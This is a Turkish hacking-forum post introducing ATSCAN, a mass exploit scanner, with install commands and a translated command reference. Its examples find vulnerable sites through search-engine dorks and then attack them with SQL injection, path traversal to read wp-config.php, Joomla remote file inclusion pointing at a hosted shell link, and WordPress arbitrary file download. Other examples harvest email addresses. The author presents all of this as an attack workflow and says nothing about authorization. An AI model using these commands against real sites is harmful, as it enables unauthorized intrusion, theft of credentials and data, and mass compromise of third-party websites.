Kali Linux ATSCAN nedir

'Hack Dökümanları' forumunda netdevilz tarafından 27 Şubat 2018 tarihinde açılan konu

  1. netdevilz Kayıtlı Üye

    Mesaj:
    11
    Beğeniler:
    7
    Öncelikle Kali Linux ATSCAN Nedir ?

    ATSCAN, kısaca dork aramaya, hedef site üzerinde ki script buglarını bulmaya, server üzerinde belirli tespit ve analiz yapmaya, encode ve decode gibi bir çok işlevleri olan çok özellikli bir tooldur. Kali Linux’u indirmek için buraya tıklaya bilirsiniz.

    KURULUM

    Kurulum konusundan bahsedecek olursak; ATSCANTR olarak kullanılabilmekte ancak ben bu tür toolların ingilizce kullanılmasını tavsiye ederim. Videoda da ingilizce olarak ele aldım. Videoda kurulum esnasında terminale şunları yazarak kurulumu gerçekleştiriyoruz sırası ile ;

    git clone GitHub - AlisamTechnology/ATSCAN: Advanced Search & Mass Exploit Scanner- فاحص متقدم لبحث و استغلال الثغرات بالجملة
    cd ATSCAN
    chmod +x ./atscan.pl
    chmod +x ./install.sh
    ./install.sh


    KULLANIM

    Kurulum aşamasını geçtikten sonra Kullanımından bahsedecek olursak. Oldukça kullanışlı olduğunu sizde “atscan –h “ yazarak görebilirsiniz. Şimdi temel olarak sistemi açıklarını aktif olarak belirli bir seviye dizgisinde taramaya yarıyor. Server, İP ve Firewall Bilgilerini bu program aracılığı ile yapabiliyoruz. Aşağıda paylaştığım videoda basit ve orta derecede kullanımından bahsettim nasıl kullanıldığı ile alakalı olarak aklınızda bir pratik olması açısından. Videonun altında help fonksiyonu altındaki tüm içeriği türkçe olarak paylaşacağım.

    Ayrıca Videoda Bahsetmeyi unuttuğum bir şey daha var. Terminalde “atscan –interactive” yazarsanız ve “options” yazarsanız “normal” ve “advenced” seviyede tarama modlarını görebilirsiniz. Burada değerler default olarak “0” değerindedir. Belirli bir seviyede devam etmek isterseniz. Oldukça işlemleriniz kolaylaşabilir. İlgili ekran görüntüsü :




    SALDIRI


    Saldırı aşamasında örnek basit bi sqlmap aracı ile sql injection gerçekleştirdik. Videonun uzamaması için. Bunun haricinde XSS saldırıları ve verilen İp bilgileri ile nmap soruları gerçekleştirilebilir. Server bilgisinden saldırılar gerçekleştirilebilinir. Bunlar tamamen Kullanıcının bilgisine bağlı olarak değişiklik gösterecektir.



    Aşağıya komut arşivini de bırakayım.

    Kod:
    –proxy       | Taramalar icin proxy’yi ayarla [EX: –proxy “socks://localhost:9050”]
    | proxy ayarla [EX: –proxy “http://12.45.44.2:8080”]
    | proxy listesi ayarla [EX: –proxy list.txt]
    -m             | Arama motorlarini varsayilan bing EX olarak ayarlayin: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
    –proxy-random | Rastgele proxy [EX: –proxy-random list.txt] or –proxy-random “socks://localhost:9050”]
    –m-random     | Tum disponibles motorlarinin rastgele
    –brandom      | Tum disponibles ajanlari rastgele
    –timeout      | Tarayici zaman asimini ayarla (saniye olarak)
    –freq        | Rasgele zaman frekansi (saniye olarak)
    –dork | -d    | Aranacak dork [Or: house [OTHER] cars [OTHER] otel]
    -t             | Hedef
    –level | -l   | Tarama duzeyi (+ – Taranacak sayfa sonuclari sayisi)
    -p             | EX test parametresini ayarlayin:id,cat,product_ID
    –save | -s    | Cikti dosyasi.
    –source       | Html cikti klasoru.
    –content      | Yanit icerigini yazdir.
    –data        | veri. Orneklere bak
    –post        | Posta yontemini kullan
    –get          | Alma yontemini kullan
    –header       | Basliklari ayarla.
    –host        | Alan adi [Ex: site.com]
    –nobanner     | Arac seridini gizle
    –beep        | Pozitif tarama bulunursa uyari sesi cikar.
    –ifend        | Tarama islemi bittiginde bip sesi cikar.
    –noinfo       | Ekstra sonuc bilgisi atla.
    –limit        | Tarama, tanimlanan miktarda pozitif sonuclara ulastiginda duraklatin
    –valid | -v   | Dize olarak dogrulama
    –status       | Http ustbilgi durumuna gore dogrulama
    –ifinurl      | Tam dizeyle eslesen hedefleri alin
    –sregex       | Tam esleme ile eslesen hedefleri alin
    –unique       | Tam dork eslesen hedefleri alin
    –replace      | Degistirilecek dize
    –with        | Ile degistirilecek dizge
    –full        | –replace –full Dizeden tum url parametrelerini sonuna kadar degistirecek
    –payload      | Arac yukleri yerine kendi yuklerini kullan
    –exp          | Exploit/Payload
    –sql          | Xss tarama
    –lfi          | Yerel dosya dahil etme
    –joomrfi      | Joomla yerel dosya icerigini tara.
    –shell        | Shell link [Ex: http://www.site.com/shell.txt]
    –wpafd        | Keyfi dosya indirmek icin wordpress sitelerini tara
    –admin        | Site yonetici sayfasi alin
    –shost        | Site alt alanlari bulun
    –tcp          | TCP port
    –udp          | UDP port
    –sites        | Sunucudaki siteler
    –wp           | Sunucudaki WordPress siteleri
    –joom        | Sunucudaki joomla siteleri
    –upload       | Sunucuda yukleme dosyalari olan siteleri alin
    –zip          | Sunucuda zip dosyalari bulunan siteleri alma
    –md5          | Md5’e donusturun
    –encode64     | Base64 dizesini kodla
    –decode64     | Base64 dizgesini cozer
    –TARGET       | Harici komutla hedef tarafindan degistirilecek
    –HOST        | Harici komutla ana bilgisayarla degistirilecek
    –HOSTIP       | Degistirilecek extern komutunda ana bilgisayar IP
    –PORT        | Harici komutla acik port degistirilecek
    –ip           | Ips almak icin tarama yapin
    –regex        | Regex ile eslesen dizeleri almak icin tarama yapin
    –noquery      | Dize degerini Query URL’sinden kaldir [ex: site.com/index.php?id=string]
    –command      | Calistirmak icin Extern Komutanligi
    –email        | E-postalar alin
    rang(x-y)      | Ornek: –exp “/index.php?id=rang(1-9)” –sql OR -t “site.com/index.php?id=rang(1-9)” –sql
    | site.com/index.php?id=1->9
    repeat(txt-y) | Ornek: –exp “/index.php?id=repeat(../-9)wp-config.php” –sql OR -t “site.com/index.php?id=../wp-config.php”
    | In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
    [DATA/DATAFILE]| To separate data values ex: –data “name:username [DATA]email:xxxxxx [DATA]pass:xxxxx”
    | Wordlist: –data “name:username [DATA]email:xxxx@xx.com [DATAFILE]pass:/root/Desktop/list.txt”
    [OTHER]        | Diger tum degerleri ayri tutmak icin (dork exploit payload proxy target..) ornek: –dork “dork1 [OTHER]DORK2 [OTHER]DORK3”
    –pass        | Arac parolasini ayarlayin veya duzenleyin
    –config       | Yapilandirmayi ayarla.
    –update       | Araci guncelle.
    –uninstall    | Araci kaldir
    ———————————————————————————-
    [::] Ornekler:
    ———————————————————————————-
    PROXY:
    Tor: –proxy socks://localhost:9050
    Proxy: –proxy <proxy> [Ex: http://12.32.1.5:8080] | –proxy <list.txt>.
    ———————————————————————————-
    SET HEADERS:
    –header “Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1”
    ———————————————————————————-
    RASTGELE
    Rastgele proxy: –proxy-random [proxy | list.txt]
    Rastgele ajan: –b-random
    Rasgele motor: –m-random
    ———————————————————————————-
    ARAMA MOTORU:
    Arama: atscan –dork <dork> –level <level>
    Arama: atscan -d <dork> -l <level>
    Motor ayarla: atscan –dork <dork> –level <level> -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
    Secici motorlari ayarla: atscan -d <dork> -l <level> -m 1,2,3..
    Bircok dork ile arama yapin: atscan –dork <dork1 [OTHER]dork2 [OTHER]dork3> –level <level>
    Arama ve rand: atscan -d <dork> -l <level> –exp “/index.php?id=rang(1-9)” –sql
    Sunucu sitelerini edinin: atscan -t <ip> –level <value> –sites
    Sunucu wordpress sitelerini edinin: atscan -t <ip> –level <value> –wp
    Sunucu joomla sitelerini edinin: atscan -t <ipbgn-ipend> –level <value> –joom
    Sunucu yukleme sitelerini edinin: atscan -t <ip> –level <value> –upload
    Server zip sitelerini alin: atscan -t <ip> –level <value> –zip
    WP Arbitry Dosya indirme: atscan -t <ip> –level <value> –wpafd
    Joomla RFI: atscan -t <ip> –level <10> –joomfri –shell <shell link>
    Arama + cikis: atscan –dork <dorks.txt> –level <level> –save
    Arama + e-postalari alin: atscan -d <dorks.txt> -l <level> –email
    Arama + site e-postalari alin: atscan –dork <site:site.com> –level <level> –email
    E-postalari belirt: atscan -d <dorks.txt> -l <level> –email -v “@gmail | @yahoo ..”
    Arama + ips almak: atscan –dork <dork> –level <level> –ip
    ———————————————————————————-
    DUZENLI IFADELER:
    Regex kullanimi: atscan [–dork <dork> | -t <target>] –level <level> –regex <regex>
    IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
    E-mails: ((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\\-+)|([A-Za-z0-9]+\\.+)|([A-Za-z0-9]+\\++))*[A-Za-z0-9]+@((\\w+\\-+)|(\\w+\\.))*\\w{1,63}\\.[a-zA-Z]{2,6})
    ———————————————————————————-
    REPEATER:
    atscan -t “site.com?index.php?id=rang(1-10)” –sql
    atscan -t <target> –exp “/index.php?id=rang(1-10)” –sql
    atscan -t <target> –exp “/index.php?id=repeat(../-9)wp-config.php”
    ———————————————————————————-
    PORTS:
    atscan -t <ip> –port <port> [–udp | –tcp]
    atscan -t (ip start)-(ip end) –port <port> [–udp | –tcp]
    atscan -t <ip> –port (port start)-(port end) [–udp | –tcp] –command “Harici komutlar”
    ———————————————————————————-
    ENCODE / DECODE:
    Generate MD5: –md5 <string>
    Encode base64: –encode64 <string>
    Decode base64: –decode64 <string>
    ———————————————————————————-
    POST/GET DATA:
    Post data: atscan -t <target> –data “field1:value1[DATA]field2:value2[DATA]field3:value3” –post | –get
    atscan -t <target> –data “username:john[DATA]pass:1234 –post | –get
    Wordlist: atscan -t <target> –data “name:username [DATA]email:xxxx@xx [DATAFILE]pass:/root/Desktop/list.txt”
    Post + Validation: –data “name:userfile[DATAFILE]value:file.txt” -v <string> | –status <code> –post | –get
    ———————————————————————————-
    HARICI KOMUTLAR:
    atscan –dork <dork | dorks.txt> –level <level> –command “curl -v –TARGET”
    atscan –dork <dork | dorks.txt> –level <level> –command “curl -v –HOST”
    atscan –dork <dork | dorks.txt> –level <level> –command “nmap -sV -p 21,22,80 –HOSTIP”
    atscan -t <target> –port 80 –udp –command “nmap -sV -p –PORT –TARGET”
    atscan -d “index of /lib/scripts/dl-skin.php” -l 20 -m 2 –command “php WP-dl-skin.php-exploit.php –TARGET”
    ———————————————————————————-
    COKLU TARAMA:
    atscan –dork <dork> –level <10> –sql –lfi –wp ..
    atscan –dork <dork> –level <10> –replace <string> –with <string> –exp <exploit> [–sql | –lfi | –wp |…]
    atscan -t <ip> –level <10> [–sql | –lfi | –wp |…]
    atscan -t <targets> [–sql | –lfi | –wp |…]
    ———————————————————————————-
    PAYLOAD’LARIN KULLANIMI:
    atscan –dork <dork> –level <10> [–lfi | –sql ..] –payload <payload | payloads.txt>
    ———————————————————————————-
    ARAMA VALIDASYONU:
    atscan -d <dork | dorks.txt> -l <level> –status <code> | –valid <string>
    atscan -d <dork | dorks.txt> -l <level> –ifinurl <string>
    atscan -d <dork | dorks.txt> -l <level> –regex <regex> –valid <string>
    atscan -d <dork | dorks.txt> -l <level> –unique
    ———————————————————————————-
    TARAMA TEYITATI:
    atscan -t <target | targets.txt> [–status <code> | –valid <string>]
    atscan -d <dork | dorks.txt> -l <level> –exp <payload> –status <code> | –valid <string>
    atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –status <code> | –valid <string>
    atscan -d <dork | dorks.txt> -l <level> [–admin | –sql ..] –status <code> | –valid <string>
    atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –status <code> | –valid <string>
    atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –full –status <code> | –valid <string>
    atscan -d <dorks.txt> -l <level> –replace <string> –with <string> –exp <payload> –status <code> | –valid <string>
    atscan –data “name:userfile[DATAFILE]value:file.txt” –post -v <string> | –status <code>
    atscan -d <dork | dorks.txt> -l <level> [–sql | –shost ..] –status <code> | –valid <string&g
     
    KocaReis ve X-GRE3D bunu beğendi.
  2. KocaReis Grafik & Tasarım Grafiker PH. Özel Kuvvetler

    Mesaj:
    458
    Beğeniler:
    360
    Cinsiyet:
    Erkek
    Teşekkürler
     
    netdevilz bunu beğendi.
Yükleniyor...

Bu Sayfayı Paylaş